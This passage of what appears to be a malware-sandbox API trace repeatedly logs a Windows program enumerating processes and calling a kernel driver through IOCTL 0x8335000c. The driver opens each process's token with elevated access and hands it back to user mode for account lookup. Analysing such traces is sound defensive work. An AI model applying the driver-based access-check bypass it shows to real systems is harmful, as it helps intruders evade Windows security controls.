ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.419] CloseHandle (hObject=0xc0) returned 1 [0185.419] CloseHandle (hObject=0xc4) returned 1 [0185.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x844) returned 0xc4 [0185.419] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.420] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020acb30, HandleInformation=0x0) returned 0x0 [0185.420] ObOpenObjectByPointer (in: Object=0xfffffa80020acb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.420] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x14 [0185.420] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.420] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.420] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.420] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.420] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.422] CloseHandle (hObject=0xc0) returned 1 [0185.422] CloseHandle (hObject=0xc4) returned 1 [0185.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x854) returned 0xc4 [0185.422] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.423] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020b8b30, HandleInformation=0x0) returned 0x0 [0185.423] ObOpenObjectByPointer (in: Object=0xfffffa80020b8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.423] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x14 [0185.423] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.423] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.423] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.423] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.423] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.425] CloseHandle (hObject=0xc0) returned 1 [0185.425] CloseHandle (hObject=0xc4) returned 1 [0185.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x864) returned 0xc4 [0185.425] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.425] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020c1760, HandleInformation=0x0) returned 0x0 [0185.425] ObOpenObjectByPointer (in: Object=0xfffffa80020c1760, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.425] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x14 [0185.425] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.425] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.426] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.426] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.426] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.428] CloseHandle (hObject=0xc0) returned 1 [0185.428] CloseHandle (hObject=0xc4) returned 1 [0185.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x874) returned 0xc4 [0185.428] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.428] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020cf7c0, HandleInformation=0x0) returned 0x0 [0185.428] ObOpenObjectByPointer (in: Object=0xfffffa80020cf7c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.428] ObfDereferenceObject (Object=0xfffffa80020cf7c0) returned 0x14 [0185.428] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.428] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.429] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.429] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.429] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.431] CloseHandle (hObject=0xc0) returned 1 [0185.431] CloseHandle (hObject=0xc4) returned 1 [0185.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x884) returned 0xc4 [0185.431] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.431] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020d1b30, HandleInformation=0x0) returned 0x0 [0185.431] ObOpenObjectByPointer (in: Object=0xfffffa80020d1b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.431] ObfDereferenceObject (Object=0xfffffa80020d1b30) returned 0x14 [0185.431] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.431] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.431] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.432] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.432] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.434] CloseHandle (hObject=0xc0) returned 1 [0185.434] CloseHandle (hObject=0xc4) returned 1 [0185.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0xc4 [0185.434] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.434] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020e7060, HandleInformation=0x0) returned 0x0 [0185.434] ObOpenObjectByPointer (in: Object=0xfffffa80020e7060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.434] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x14 [0185.434] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.434] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.434] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.435] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.435] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.437] CloseHandle (hObject=0xc0) returned 1 [0185.437] CloseHandle (hObject=0xc4) returned 1 [0185.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a4) returned 0xc4 [0185.438] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.438] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020f3530, HandleInformation=0x0) returned 0x0 [0185.438] ObOpenObjectByPointer (in: Object=0xfffffa80020f3530, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.438] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x14 [0185.438] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.438] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.438] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.438] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.438] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.440] CloseHandle (hObject=0xc0) returned 1 [0185.440] CloseHandle (hObject=0xc4) returned 1 [0185.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b4) returned 0xc4 [0185.440] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.441] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001fc7b30, HandleInformation=0x0) returned 0x0 [0185.441] ObOpenObjectByPointer (in: Object=0xfffffa8001fc7b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.441] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x14 [0185.441] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.441] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.441] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.441] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.441] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.443] CloseHandle (hObject=0xc0) returned 1 [0185.443] CloseHandle (hObject=0xc4) returned 1 [0185.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0xc4 [0185.443] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.443] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f6e180, HandleInformation=0x0) returned 0x0 [0185.443] ObOpenObjectByPointer (in: Object=0xfffffa8001f6e180, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.443] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x14 [0185.443] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.443] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.444] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.444] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.444] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.446] CloseHandle (hObject=0xc0) returned 1 [0185.446] CloseHandle (hObject=0xc4) returned 1 [0185.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8d4) returned 0xc4 [0185.446] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.446] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f77b30, HandleInformation=0x0) returned 0x0 [0185.446] ObOpenObjectByPointer (in: Object=0xfffffa8001f77b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.446] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x14 [0185.446] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.446] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.446] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.446] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.446] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.448] CloseHandle (hObject=0xc0) returned 1 [0185.448] CloseHandle (hObject=0xc4) returned 1 [0185.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e4) returned 0xc4 [0185.448] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.448] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800208ab30, HandleInformation=0x0) returned 0x0 [0185.448] ObOpenObjectByPointer (in: Object=0xfffffa800208ab30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.448] ObfDereferenceObject (Object=0xfffffa800208ab30) returned 0x14 [0185.448] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.448] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.448] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.448] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.448] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.450] CloseHandle (hObject=0xc0) returned 1 [0185.450] CloseHandle (hObject=0xc4) returned 1 [0185.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8f4) returned 0xc4 [0185.450] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.450] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020a3b30, HandleInformation=0x0) returned 0x0 [0185.450] ObOpenObjectByPointer (in: Object=0xfffffa80020a3b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.450] ObfDereferenceObject (Object=0xfffffa80020a3b30) returned 0x14 [0185.450] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.450] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.450] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.451] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.451] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, 